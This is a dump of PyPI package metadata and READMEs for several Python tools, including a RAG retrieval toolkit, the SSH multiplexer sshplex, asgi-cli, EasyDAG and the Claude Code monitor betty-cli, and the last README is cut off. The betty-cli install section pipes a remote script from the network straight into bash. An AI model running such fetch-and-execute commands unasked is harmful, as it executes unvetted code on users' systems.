│ └── db_builder.py # ベクトル DB 作成クラス
├── retrievers/
│ └── faiss_retriever.py # 検索クラス(ライブラリの中心)
└── tools/
└── tool.py # LLM ツール基底クラス
```
---
## クラス概要
| クラス | 役割 |
|---|---|
| `DBBuilder` | PDF・CSV・JSON からベクトル DB を作成する |
| `FaissRetriever` | 単体検索・複数 DB 横断検索・LLM ツール連携をすべて担うコアクラス |
| `Tool` | LLM エージェント連携用の抽象基底クラス |
### DBBuilder が出力するファイル形式
| ソース | デフォルトのファイル名 | FaissRetriever での読み込み |
|---|---|---|
| PDF | `vector_index.faiss` / `metadata.json` | デフォルト設定で読める |
| CSV | `qa_index.faiss` / `qa_metadata.json` | `index_filename` / `meta_filename` を指定 |
| JSON | `knowledge_index.faiss` / `knowledge_metadata.json` | `index_filename` / `meta_filename` を指定 |
---
## DB の作成(DBBuilder)
### 基本的な流れ
```python
from rag_toolkit import DBBuilder
builder = DBBuilder(output_dir="database/my_system/")
# PDF からマニュアル DB を作成
builder.build_from_pdf(["manual.pdf", "release_notes.pdf"])
# CSV(Q/A)から QA DB を作成
builder.build_from_csv("qa.csv")
# JSON からキャラクター知識 DB を作成
builder.build_from_json("knowledge.json")
```
### 例1: PDF からマニュアル DB
```python
from rag_toolkit import DBBuilder
builder = DBBuilder(
output_dir="database/sample_XYZ_system/",
chunk_size=1000, # 1チャンクあたりの文字数
chunk_overlap=200, # チャンク間のオーバーラップ文字数
)
builder.build_from_pdf(
pdf_files=[
"database/sample_XYZ_system/XYZシステムリリースノート.pdf",
"database/sample_XYZ_system/XYZシステム統合ユーザーマニュアル.pdf",
],
index_filename="vector_index.faiss",
meta_filename="metadata.json",
)
```
### 例2: CSV(Q/A形式)から QA DB
```python
builder.build_from_csv(
csv_file="database/sample_XYZ_system/XYZ_system_QA.csv",
question_col="Q", # 質問列のヘッダー名
answer_col="A", # 回答列のヘッダー名
index_filename="qa_index.faiss",
meta_filename="qa_metadata.json",
)
```
### 例3: JSON からキャラクター知識 DB
```python
from rag_toolkit import DBBuilder
knowledge_builder = DBBuilder(output_dir="database/DB_ikazuchi_mal/")
knowledge_builder.build_from_json(
json_file="database/documents_mal_knowledge.json",
index_filename="knowledge_index.faiss",
meta_filename="knowledge_metadata.json",
category_value="いかづちマル", # metadata["カテゴリ"] を上書きしたい場合
)
```
### 複数 DB を作る際のモデル共有(メモリ節約)
```python
from rag_toolkit import DBBuilder
# builder を 1 つ作り、同じモデルで複数の DB を続けて作成できる
builder = DBBuilder(output_dir="database/sample_XYZ_system/")
builder.build_from_pdf([...])
builder.build_from_csv(...)
# 別の出力先に作る場合もモデルを渡して使い回せる
knowledge_builder = DBBuilder(
output_dir="database/DB_ikazuchi_mal/",
model=builder.model, # ← ロード済みモデルを渡す
)
knowledge_builder.build_from_json(...)
```
---
## DB の検索(FaissRetriever)
### 1. 単体検索
```python
from rag_toolkit import FaissRetriever
# マニュアル検索
manual = FaissRetriever(
name="search_xyz_manual",
description="XYZシステムの仕様書・マニュアルを検索する",
database_dir="database/sample_XYZ_system/",
meta_page_key="page", # ページ番号を表示したい場合に指定
)
# QA 検索("question+answer" で Q/A 結合テキストを参照)
qa = FaissRetriever(
name="search_xyz_qa",
description="XYZシステムの過去QAを検索する",
database_dir="database/sample_XYZ_system/",
index_filename="qa_index.faiss",
meta_filename="qa_metadata.json",
meta_text_keys=["text", "question+answer"],
)
print(manual.run_query("パスワードのリセット手順"))
print(qa.run_query("ログインできない場合の対処法"))
```
### 2. 複数 DB 横断検索
```python
# スコア上位順でまとめて返す
results = FaissRetriever.search_multi([manual, qa], "ログインエラーの対処法")
for r in results:
print(r["source"], r["total_score"], r["text"])
# 文字列として取得
text = FaissRetriever.search_multi_as_str([manual, qa], "ログインエラーの対処法")
print(text)
```
### 3. LLM エージェントのツールとして使う
```python
retriever = FaissRetriever(
name="search_xyz_manual",
description="XYZシステムの仕様書・マニュアルを検索する",
database_dir="database/sample_XYZ_system/",
prompt="以下の参考情報をもとに回答してください。",
)
context = {"query_text": "エラーコード E-501 の意味"}
result = retriever.run(context)
# result["status"] -> "success" or "ignore"
# result["message"] -> prompt + 検索結果(LLM に渡す文字列)
print(result["message"])
```
---
## 依存ライブラリ
| ライブラリ | 用途 |
|---|---|
| `faiss-cpu >= 1.7` | ベクトルインデックスの構築・検索 |
| `sentence-transformers >= 2.2` | テキストの埋め込みベクトル化 |
| `numpy >= 1.24` | 数値演算 |
| `pdfminer.six`(任意) | PDF からのテキスト抽出(`build_from_pdf` 使用時のみ) |
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.13 | [] | [] | [] | [
"faiss-cpu>=1.13.2",
"numpy>=2.4.2",
"pdfminer-six>=20260107",
"sentence-transformers>=5.2.3",
"twine>=6.2.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.9 | 2026-02-20T09:33:59.253422 | rag_support_toolkit-0.1.1.tar.gz | 16,848 | d7/68/4ca704cc8e0371aa090b2e030e7e620c217a0f9fa362d0539f76490c8090/rag_support_toolkit-0.1.1.tar.gz | source | sdist | null | false | cb0a1e96321b5a09b7de93198f3c3aa7 | 47c1bdfb04f38acdedb7803ea4f0f2ab683c1d36a202f27b8f2c0174ea9882a4 | d7684ca704cc8e0371aa090b2e030e7e620c217a0f9fa362d0539f76490c8090 | null | [] | 216 |
2.4 | sshplex | 1.3.1 | Multiplex your SSH connections with style | 
**Multiplex your SSH connections with style**
SSHplex is a Python-based SSH connection multiplexer that provides a modern Terminal User Interface (TUI) for selecting and connecting to multiple hosts simultaneously using tmux. It integrates with multiple Sources of Truth (NetBox, Ansible, Consul, static lists) and creates organized tmux sessions for efficient multi-host management.
## Features
- **Interactive TUI**: Modern host selector built with Textual - search, sort, select, connect
- **Multiple Sources of Truth**: NetBox, Ansible inventories, HashiCorp Consul, and static host lists - use them together or separately
- **Multi-Provider Support**: Configure multiple instances of the same provider type (e.g., multiple NetBox instances, multiple Consul datacenters)
- **tmux Integration**: Creates organized sessions with panes or windows for each host
- **iTerm2 Integration**: Native tmux `-CC` mode on macOS for iTerm2 tabs/splits, with improved detection and fallback guidance
- **Proxy Support**: Per-provider SSH proxy/jump host configuration
- **Wildcard Search**: Filter hosts across all columns with glob patterns
- **Config Editor**: Edit `sshplex.yaml` directly from the TUI (`e`) with tabbed form and validation
- **Built-in Help**: Keyboard shortcuts help modal (`h`) with live mode/state hints
- **Sortable Columns**: Click column headers to sort the host table
- **Copy to Clipboard**: Copy the host table to clipboard for sharing
- **Intelligent Caching**: Local host caching for fast startup (configurable TTL)
- **Broadcasting**: Sync input across multiple SSH connections
- **Session Manager**: Browse, connect to, or kill existing tmux sessions from the TUI
- **SSH Security**: Configurable host key checking with secure defaults
- **Connection Retry**: Automatic retry with exponential backoff for reliability
- **Enhanced CLI**: Debug mode, cache management, and configuration utilities
## Prerequisites
- **Python 3.8+**
- **tmux**
- **SSH key** configured for target hosts
- **macOS or Linux** (Windows via WSL)
```bash
# macOS
brew install tmux python3
# Ubuntu/Debian
sudo apt install tmux python3 python3-pip
# RHEL/CentOS/Fedora
sudo dnf install tmux python3 python3-pip
```
## Installation
### From PyPI
```bash
pip install sshplex
# With Consul support
pip install "sshplex[consul]"
```
### From Source
```bash
git clone https://github.com/sabrimjd/sshplex.git
cd sshplex
pip install -e .
# With Consul support
pip install -e ".[consul]"
# With dev dependencies
pip install -e ".[dev]"
```
## Quick Start
```bash
# Launch TUI (creates default config on first run)
sshplex
# Debug mode - test provider connectivity
sshplex --debug
# Show configuration paths
sshplex --show-config
# Clear host cache
sshplex --clear-cache
```
On first run, SSHplex creates a config at `~/.config/sshplex/sshplex.yaml`. Edit it with your provider details, then run `sshplex` again.
## What's New (Quality Upgrade)
Recent quality and UX improvements include:
- Stronger config/runtime error handling and input validation
- iTerm2 integration reliability improvements (installation/running detection + better fallback messaging)
- Parallel provider fetching support for faster multi-provider discovery
- Faster cache validity checks before deep metadata parsing
- TUI polish: config editor (`e`), help modal (`h`), and improved visual selection cues
See [CHANGELOG.md](CHANGELOG.md) for full details.
## Usage
1. **Start**: Run `sshplex`
2. **Browse**: Hosts from all configured providers appear in the table
3. **Search**: Press `/` to filter hosts (supports wildcards)
4. **Select**: `Space` to toggle, `a` to select all, `d` to deselect all
5. **Configure**: `p` to toggle panes/tabs, `b` to toggle broadcast
6. **Edit Config**: `e` to open the built-in configuration editor
7. **Connect**: `Enter` to create tmux session and connect
8. **Sessions**: `s` to manage existing tmux sessions
9. **Copy**: `c` to copy the host table to clipboard
10. **Refresh**: `r` to refresh hosts from providers (bypasses cache)
### TUI Keybindings
| Key | Action |
|-----|--------|
| `Space` | Toggle host selection |
| `a` | Select all hosts |
| `d` | Deselect all hosts |
| `Enter` | Connect to selected hosts |
| `/` | Search/filter hosts |
| `p` | Toggle panes/tabs mode |
| `b` | Toggle broadcast mode |
| `s` | Open session manager |
| `e` | Open configuration editor |
| `h` | Open keyboard shortcuts help |
| `c` | Copy table to clipboard |
| `r` | Refresh from providers |
| `Escape` | Focus table / clear search |
| `q` | Quit |
### tmux Commands (once attached)
```bash
Ctrl+b + Arrow Keys # Switch between panes
Ctrl+b + n/p # Next/Previous window
Ctrl+b + b # Toggle broadcast (custom SSHplex binding)
Ctrl+b + d # Detach from session
Ctrl+b + z # Zoom/unzoom current pane
```
## CLI Reference
```bash
sshplex # Launch TUI
sshplex --debug # Test provider connectivity
sshplex --clear-cache # Clear host cache
sshplex --show-config # Show configuration paths
sshplex --config /path/to.yml # Use custom config file
sshplex --verbose # Enable verbose logging
sshplex --version # Show version
```
## Configuration
Configuration is stored at `~/.config/sshplex/sshplex.yaml`. See [config-template.yaml](sshplex/config-template.yaml) for a full example.
### Static Hosts
```yaml
sot:
import:
- name: "my-servers"
type: static
hosts:
- name: "web-01"
ip: "192.168.1.10"
description: "Web server"
tags: ["web", "production"]
- name: "db-01"
ip: "192.168.1.20"
description: "Database server"
tags: ["database", "production"]
```
### NetBox
```yaml
sot:
import:
- name: "prod-netbox"
type: netbox
url: "https://netbox.example.com/"
token: "your-api-token"
verify_ssl: true
timeout: 30
default_filters:
status: "active"
role: "virtual-machine"
has_primary_ip: "true"
```
### Ansible Inventory
```yaml
sot:
import:
- name: "production-hosts"
type: ansible
inventory_paths:
- "/path/to/inventory.yml"
default_filters:
groups: ["webservers", "databases"]
exclude_groups: ["maintenance"]
host_patterns: ["^prod-.*"]
```
### Consul
Requires `pip install "sshplex[consul]"`.
```yaml
sot:
import:
- name: "consul-dc1"
type: consul
config:
host: "consul.example.com"
port: 443
token: "your-consul-token"
scheme: "https"
verify: false
dc: "dc1"
cert: "" # Optional SSL cert path
```
### SSH Proxy / Jump Host
Configure per-provider proxy routing:
```yaml
ssh:
username: "admin"
key_path: "~/.ssh/id_ed25519"
port: 22
proxy:
- name: "prod-proxy"
imports: ["consul-dc1", "prod-netbox"] # Which providers use this proxy
host: "jumphost.example.com"
username: "admin"
key_path: "~/.ssh/jump_key"
```
### SSH Security Options
Configure SSH host key checking and retry behavior:
```yaml
ssh:
username: "admin"
key_path: "~/.ssh/id_ed25519"
# Security options
strict_host_key_checking: false # Options: true (strict), false (accept-new)
user_known_hosts_file: "" # Empty = default ~/.ssh/known_hosts
# Connection retry
retry:
enabled: true
max_attempts: 3
delay_seconds: 2
exponential_backoff: true # Double delay on each retry
```
**Security Note**: By default, SSHplex uses `StrictHostKeyChecking=accept-new` which automatically accepts new host keys but warns on key changes. For production environments, set `strict_host_key_checking: true` for maximum security.
### iTerm2 Integration (macOS)
Enable native iTerm2 tmux integration with `-CC` mode:
```yaml
tmux:
control_with_iterm2: true # Opens new iTerm2 window with native tabs/splits
```
### Cache
```yaml
cache:
enabled: true
cache_dir: "~/.cache/sshplex"
ttl_hours: 24 # Refresh daily
```
### UI
```yaml
ui:
show_log_panel: false
table_columns: ["name", "ip", "cluster", "role", "tags", "description", "provider"]
```
## Troubleshooting
### Debug Mode
```bash
sshplex --debug
```
Tests provider connectivity and lists all discovered hosts.
### Enable Logging
```yaml
logging:
enabled: true
level: "DEBUG"
file: "logs/sshplex.log"
```
### Common Issues
| Issue | Solution |
|-------|----------|
| `tmux is not installed` | Install tmux: `brew install tmux` / `apt install tmux` |
| NetBox connection failed | Check URL, token, and network connectivity |
| Ansible inventory not loading | Verify file paths exist and YAML syntax is valid |
| No hosts found | Remove filters temporarily, check provider logs |
| Consul import error | Install with `pip install "sshplex[consul]"` |
| SSH key auth failed | Check key path and permissions (`chmod 600`) |
## Development
```bash
git clone https://github.com/sabrimjd/sshplex.git
cd sshplex
pip install -e ".[dev]"
# Run tests
python3 -m pytest tests/
# Lint & quality checks
ruff check sshplex tests
mypy sshplex
vulture sshplex tests --min-confidence 80
# Local Consul for testing
docker-compose -f docker-compose.consul.yml up -d
```
## Contributing
SSHplex welcomes contributions! The codebase follows the KISS principle.
## License
MIT License - see [LICENSE](LICENSE) for details.
## Author
**Sabrimjd** - [@sabrimjd](https://github.com/sabrimjd)
## Acknowledgments
- [Textual](https://textual.textualize.io/) - Modern TUI framework
- [NetBox](https://netbox.dev/) - Infrastructure source of truth
- [HashiCorp Consul](https://www.consul.io/) - Service discovery
- [tmux](https://github.com/tmux/tmux) - Terminal multiplexing
- [loguru](https://github.com/Delgan/loguru) - Logging
---
**SSHplex** - Because managing multiple SSH connections should be simple and elegant.
| text/markdown | null | MJAHED Sabri <contact@sabrimjahed.com> | null | null | MIT | ssh, tmux, multiplexer, netbox, tui, terminal | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: System :: Networking",
"Topic :: System :: Systems Administration",
"Topic :: Terminals"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pynetbox==7.6.1",
"textual==8.0.0",
"pyyaml==6.0.3",
"pydantic==2.12.5",
"loguru==0.7.3",
"rich==14.3.2",
"libtmux==0.53.1",
"pyperclip==1.11.0",
"python-consul2>=0.1.5; extra == \"consul\"",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"black>=22.0.0; extra == \"dev\"",
"flake8>=5.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"ruff>=0.8.0; extra == \"dev\"",
"vulture>=2.11; extra == \"dev\"",
"types-PyYAML>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/sabrimjd/sshplex",
"Repository, https://github.com/sabrimjd/sshplex",
"Documentation, https://github.com/sabrimjd/sshplex#readme",
"Bug Tracker, https://github.com/sabrimjd/sshplex/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:33:53.942041 | sshplex-1.3.1.tar.gz | 62,622 | 1b/e3/58701c7e3e6f0814d8e31d566558d200d1e593fc57cdd39520e3b615bc8c/sshplex-1.3.1.tar.gz | source | sdist | null | false | 6bcd93586edc33f6745b648461545054 | bdaa81972fb5153ada67599f07a8b9991ce2144e1642680dbb0581ab5735dc4f | 1be358701c7e3e6f0814d8e31d566558d200d1e593fc57cdd39520e3b615bc8c | null | [
"LICENSE"
] | 209 |
2.4 | asgi-cli | 0.4.5 | Call ASGI Python application from command line, just like CURL | # ASGI CLI

[](https://coveralls.io/github/akornatskyy/asgi-cli?branch=master)
[](https://badge.fury.io/py/asgi-cli)
Call [ASGI](https://asgi.readthedocs.io/en/latest/index.html)
Python application from command line, just like CURL.
If you’re using this tool, **★Star** this repository to show your interest, please!
## Install
```sh
pip install -U asgi-cli
```
## Usage
```sh
asgi-cli --help
```
```text
usage: asgi_cli [-h] [-V] [--app-dir APP_DIR] [-X METHOD] [-H HEADER]
[-d DATA | -F MULTIPART] [-I | -b | -p | -v]
[--root-path ROOT_PATH] [-n NUMBER]
app [url]
positional arguments:
app an application module
url a uniform resource locator or path (default /)
options:
-h, --help show this help message and exit
-V, --version show program's version number and exit
--app-dir APP_DIR look for APP in the specified directory, by adding this to the PYTHONPATH
-X, --request METHOD specify request method to use, e.g. POST (default GET)
-H, --header HEADER pass custom header line, e.g. -H='Accept: application/json'
-d, --data DATA request body data, e.g. '{"msg":"hello"}', 'msg=hello'
-F, --form MULTIPART specify HTTP multipart POST data, e.g. name=value or name=@file
-I, --head show status and headers only
--root-path ROOT_PATH
set the ASGI 'root_path'
-b, --benchmark issue a number of requests through repeated iterations (reports
throughtput and average call time)
-p, --profile prints out a report of top 10 functions ordered by internal time, saves to
'stats.cprof' file
-n NUMBER a number of requests to issue (default 100K)
-v, --verbose make the operation more talkative
```
## Examples
_example.py_:
```python
START = {
"type": "http.response.start",
"status": 200,
"headers": [
(b"content-length", b"13"),
(b"content-type", b"text/html; charset=utf-8"),
],
}
BODY1 = {"type": "http.response.body", "body": b"Hello"}
BODY2 = {"type": "http.response.body", "body": b", world!"}
async def app(scope, receive, send) -> None:
await send(START)
await send(BODY1)
await send(BODY2)
```
Then run the examples:
`asgi-cli example:app` prints response body:
```text
Hello, world!
```
`asgi-cli -v example:app` pretty prints scope and sent messages:
```text
{'scope': {'asgi': {'spec_version': '2.1', 'version': '3.0'},
'client': ('127.0.0.1', 49327),
'headers': [(b'accept', b'*/*'),
(b'user-agent', b'asgi-cli/0.0.1'),
(b'host', b'127.0.0.1:8000')],
'http_version': '1.1',
'method': 'GET',
'path': '/',
'query_string': b'',
'raw_path': b'/',
'root_path': '',
'scheme': 'http',
'server': ('127.0.0.1', 8000),
'type': 'http'}}
{'message': {'headers': [(b'content-length', b'13'),
(b'content-type', b'text/html; charset=utf-8')],
'status': 200,
'type': 'http.response.start'}}
{'message': {'body': b'Hello', 'type': 'http.response.body'}}
{'message': {'body': b', world!', 'type': 'http.response.body'}}
```
`asgi-cli -b example:app` shows execution stats (runs in 3 iterations, for each iteration displays requests per second and an average call time):
```text
#1 => 477.74K, 2.09μs
#2 => 438.12K, 2.28μs
#3 => 446.90K, 2.24μs
```
| text/markdown | null | Andriy Kornatskyy <andriy.kornatskyy@live.com> | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/akornatskyy/asgi-cli"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:33:34.330779 | asgi_cli-0.4.5.tar.gz | 11,712 | 12/25/26b5ffb7f867aee18c8ccbcd56aaa5417a248202fd2f8014d28e9e38cb8e/asgi_cli-0.4.5.tar.gz | source | sdist | null | false | 29755f1dfd7aba2412e27121f3ce5ac6 | 17122e36e0a80935314e8bb78ab3c7685e07e163d47e3b80df3e2f7ab6f16fc4 | 122526b5ffb7f867aee18c8ccbcd56aaa5417a248202fd2f8014d28e9e38cb8e | null | [
"LICENSE"
] | 169 |
2.4 | graph-protocol | 0.1 | Privatized | # graph-protocol | text/markdown | null | Marta Jones González <martajon10@gmail.com> | null | null | null | null | [
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"contourpy",
"cycler",
"dafsa",
"et-xmlfile",
"fonttools",
"graphviz",
"kiwisolver",
"matplotlib",
"networkx",
"numpy",
"openpyxl",
"packaging",
"pandas",
"pillow",
"pyparsing",
"python-dateutil",
"pytz",
"scipy",
"six",
"tzdata"
] | [] | [] | [] | [
"Homepage, https://github.com/martaajonees/graph-protocol",
"Issues, https://github.com/martaajonees/graph-protocol/issues"
] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T09:31:45.611865 | graph_protocol-0.1.tar.gz | 139,655 | ae/c9/e2cd40855426a072a6ba3889f891e2216023e264aae25c3d5922ff88afe3/graph_protocol-0.1.tar.gz | source | sdist | null | false | 88ea414dae79d2988c75c2aaaad0f9cd | 3ed9efe6482dbe5baa26db6300bf85cfc043640eb7eecc752b72196a716c710f | aec9e2cd40855426a072a6ba3889f891e2216023e264aae25c3d5922ff88afe3 | MIT | [
"LICENSE"
] | 173 |
2.4 | clip-protocol | 0.1 | Privatized | # graph-protocol | text/markdown | null | Marta Jones González <martajon10@gmail.com> | null | null | null | null | [
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"contourpy",
"cycler",
"dafsa",
"et-xmlfile",
"fonttools",
"graphviz",
"kiwisolver",
"matplotlib",
"networkx",
"numpy",
"openpyxl",
"packaging",
"pandas",
"pillow",
"pyparsing",
"python-dateutil",
"pytz",
"scipy",
"six",
"tzdata"
] | [] | [] | [] | [
"Homepage, https://github.com/martaajonees/graph-protocol",
"Issues, https://github.com/martaajonees/graph-protocol/issues"
] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T09:31:44.028795 | clip_protocol-0.1.tar.gz | 139,666 | 6e/b1/136d0b48c016fd0092ce32d7ed105db4eb818bcbfc86999766f0848479e6/clip_protocol-0.1.tar.gz | source | sdist | null | false | eaca86583c0adf294381f778e9389865 | 1742c81df73e23734f551f37089fadb663f312e948650b1fa39c381cf7277898 | 6eb1136d0b48c016fd0092ce32d7ed105db4eb818bcbfc86999766f0848479e6 | MIT | [
"LICENSE"
] | 149 |
2.3 | EasyDAG | 0.2.3 | A lightweight multiprocessing DAG execution engine with message queues and external control options. | # EasyDAG
**EasyDAG** is a lightweight, multiprocessing-friendly Directed Acyclic Graph (DAG) execution engine for Python.
It lets you define task nodes, declare dependencies, and execute them in parallel — while emitting structured lifecycle events and inter-process messages for logging, progress reporting, or external systems such as web dashboards.
EasyDAG is designed to be **simple, explicit, and embeddable**, without the operational overhead of workflow schedulers.
---
## Key Features
* ⚙️ Define DAGs using plain Python functions
* ⚡ Parallel execution via `multiprocessing`
* 🧠 Automatic dependency resolution
* 📬 Multiprocess-safe message queue for side effects
* 🧵 Message handlers run safely in the main process
* 🪝 Lifecycle hooks via a clean interface (ABC)
* 🛑 Cancellation, fail-fast, and timeout support
* 🌐 Optional WebSocket interface for live monitoring & control
* 📦 No external runtime dependencies for the core engine
---
## Installation
```bash
pip install easydag
```
---
## Quick Start
```python
from EasyDAG import EasyDAG, DAGNode
def task_a():
return 2
def task_b(id_a):
return id_a * 10
dag = EasyDAG(processes=4)
dag.add_node(DAGNode("id_a", task_a))
dag.add_node(DAGNode("id_b", task_b))
dag.add_edge("id_a", "id_b")
outputs = dag.run()
print(outputs)
```
---
## Core Concepts
### DAG
A **DAG** is a set of nodes with directed dependencies. A node may only execute once all of its dependencies have completed successfully.
EasyDAG guarantees:
* No node runs before its dependencies
* Each node runs at most once (unless retried)
* Independent nodes run in parallel
---
### DAGNode
Each node wraps:
* A callable function
* Static positional and keyword arguments
* Retry configuration (optional)
```python
DAGNode(
node_id="A",
func=process_data,
args=(10,),
kwargs={"foo": "bar"},
max_retries=2
)
```
Dependencies are resolved automatically by matching upstream node IDs to function parameters.
---
## Message Queue System (Side Effects)
EasyDAG includes an optional **multiprocessing-safe message queue** designed for side effects:
* Logging
* Progress updates
* Metrics
* Database writes
* External notifications
This keeps compute nodes pure and avoids unsafe shared state.
---
### Defining a Queue
```python
from EasyDAG import MultiprocessQueue
queue = MultiprocessQueue()
dag = EasyDAG(processes=4, mp_queue=queue)
```
---
### Registering Handlers (Main Process)
Handlers always run in the **main process**, never in workers.
```python
def log_progress(payload):
print("Progress:", payload)
queue.register_message_handler("progress", log_progress)
```
---
### Sending Messages from Nodes
If a node function includes the reserved `message_queue` parameter, EasyDAG injects it automatically.
```python
def process_data(x, message_queue=None):
message_queue.put(
QueueMessage("progress", {"value": x})
)
return x * 2
```
If the parameter is omitted, the queue is not passed.
---
## Lifecycle Interface (Execution Hooks)
EasyDAG exposes a formal **interface abstraction** via an abstract base class:
```python
from EasyDAG import EasyInterface
```
This allows you to observe and control execution without coupling logic to the engine.
### Supported Hooks
* `dag_started`
* `dag_finished`
* `node_started`
* `node_progress`
* `node_finished`
* `node_errored`
* `run()`
* `cancel()`
You can implement your own interface to:
* Emit events
* Drive UIs
* Collect metrics
* Integrate APIs
---
## Cancellation & Fail-Fast
EasyDAG supports:
* **User-initiated cancellation**
* **Fail-fast execution**
* **Execution timeouts**
Cancellation halts scheduling of new nodes and can be configured to terminate or safely complete in-flight tasks.
Execution outcome is tracked explicitly via DAG status (success, failed, cancelled, timeout).
---
## WebSocket + FastAPI Demo
A full working example is available at:
📁 `https://github.com/Mechatronicist/easyDAG-Web`
### What the demo shows
* Building a DAG
* Emitting node & DAG lifecycle events
* Streaming events over WebSockets
* Starting and cancelling execution from the browser
* Viewing live progress in real time
---
## When to Use EasyDAG
EasyDAG is ideal when you need:
* A **local, Python-native DAG engine**
* Parallel execution with dependencies
* Fine-grained control over execution
* Lightweight orchestration without infrastructure
* A simpler alternative to:
* Airflow
* Prefect
* Ray
* Dask
| text/markdown | Mechatronicist | null | null | null | MIT License Copyright (c) 2025 Mechatronicist Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | dag, multiprocessing, parallel, tasks, workflow | [] | [] | null | null | >=3.9 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/mechatronicist/EasyDAG",
"Repository, https://github.com/mechatronicist/EasyDAG",
"Issues, https://github.com/mechatronicist/EasyDAG/issues"
] | twine/5.1.1 CPython/3.12.7 | 2026-02-20T09:31:03.468195 | easydag-0.2.3.tar.gz | 18,759 | f2/e8/73f3befc3d26c0a86fb8aa9aa493fd74fa4960d7951da2dcaf9c88bd3faf/easydag-0.2.3.tar.gz | source | sdist | null | false | 95b85ea7b8393ee2deb4e3f2564bc612 | 62684c472c87c8e52f6b96b4d1faba734f84a729414ee9699a3ec68488a7c9c0 | f2e873f3befc3d26c0a86fb8aa9aa493fd74fa4960d7951da2dcaf9c88bd3faf | null | [] | 0 |
2.4 | betty-cli | 0.14.0 | A CLI supervisor for Claude Code sessions | <p align="center">
<img src="docs/assets/logo.png" alt="Betty" width="120">
</p>
# Betty
A real-time TUI monitor for Claude Code sessions.
## Install
```bash
curl -fsSL https://betty4.sh/install.sh | bash
```
Or directly with uv / pip:
```bash
uvx betty-cli # run without installing
uv tool install betty-cli # install permanently
pip install betty-cli # with pip
```
## Use
```bash
# Start betty
betty
# In another terminal, run Claude Code as usual
claude
```
The companion auto-detects your session. No hooks or configuration needed.
## Options
| Flag | Description |
|------|-------------|
| `--global`, `-g` | Watch all projects |
| `--worktree`, `-w` | Watch across git worktrees |
| `--style` | UI style (`rich` or `claude-code`) |
| `--version`, `-v` | Show version |
## Commands
| Command | Description |
|---------|-------------|
| `config` | Configure LLM summarization and UI settings |
| `mock --demo` | Generate mock sessions for development |
## Keybindings
### Navigation
| Key | Action |
|-----|--------|
| `j/k` | Navigate turns |
| `g/G` | Jump to beginning/end |
| `1-9` | Switch sessions |
| `h/l` | Switch panels (manager expand mode) |
### Display
| Key | Action |
|-----|--------|
| `o` / `Space` / `Enter` | Expand/collapse turn or span |
| `e/c` | Expand/collapse all |
| `f` | Cycle filters (All, Spans, Tools, Read, Write, Edit, Bash) |
| `s/S` | Toggle summaries / Summarize all |
### Views
| Key | Action |
|-----|--------|
| `M` | Toggle manager view |
| `T` | Toggle tasks view |
| `P` | Toggle plan view |
| `I` | Toggle insights (analysis) panel |
### Analysis & Annotations
| Key | Action |
|-----|--------|
| `A` | Analyze selected turn/span/session |
| `[`/`]` | Zoom analysis level (turn / span / session) |
| `n` | Annotate selected turn |
| `a` | Toggle/clear alerts |
### Agent
| Key | Action |
|-----|--------|
| `B` | Toggle agent panel (closed / full / compact) |
| `?` | Ask Betty a question about the session |
### Other
| Key | Action |
|-----|--------|
| `O` | Open PR in browser |
| `x` | Export to Markdown |
| `m` | Edit monitor instructions |
| `D` | Delete session |
| `Esc` | Close panel / clear selection |
| `q` | Quit |
## Betty Agent
Betty Agent is a continuous session observer that tracks what Claude Code is doing and flags problems in real time. It combines heuristic detectors with optional LLM-powered narrative and drift detection.
### Enable
```bash
betty config --agent
```
Or set the environment variable `BETTY_AGENT_ENABLED=true`.
### What it does
